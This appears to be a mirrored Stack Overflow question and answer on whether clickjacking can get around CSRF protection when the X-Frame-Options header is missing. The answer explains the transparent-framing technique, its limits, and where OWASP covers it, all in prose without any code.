•  06-07-2023
  •  | 
  •  

Question

Is it possible to execute CSRF through clickjacking vulnerability?

Suppose my website is fully protected from csrf attack but there is no XFO so is there any way to way exploit CSRF through clickjacking vulnerability ?

I heard about xmlhttprequest it can be use to execute csrf if there is no XFO but have csrf protection, so any idea ?

Was it helpful?

Solution

Yes, if there is no X-Frame-Options response header present, an attacker can frame your page and make it transparent, so when the victim tries to click the button on the attacker's site (e.g. Click here to win an iPad) they are infact interacting with your page (e.g. Click here to Initiate Bank Transfer).

This relies on the victim being already authenticated with the target site, and also relies on there being a one click action available on the site. If there is a form to fill in that cannot be pre-filled by the use of parameters, then this particular attack is not possible without tricking the victim into completing these somehow. This makes clickjacking more of a risk for parameterless forms, or when only hidden inputs or JavaScript variables are used.

See OWASP's pages on Clickjacking and Testing for Clickjacking for more information.

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow
scroll top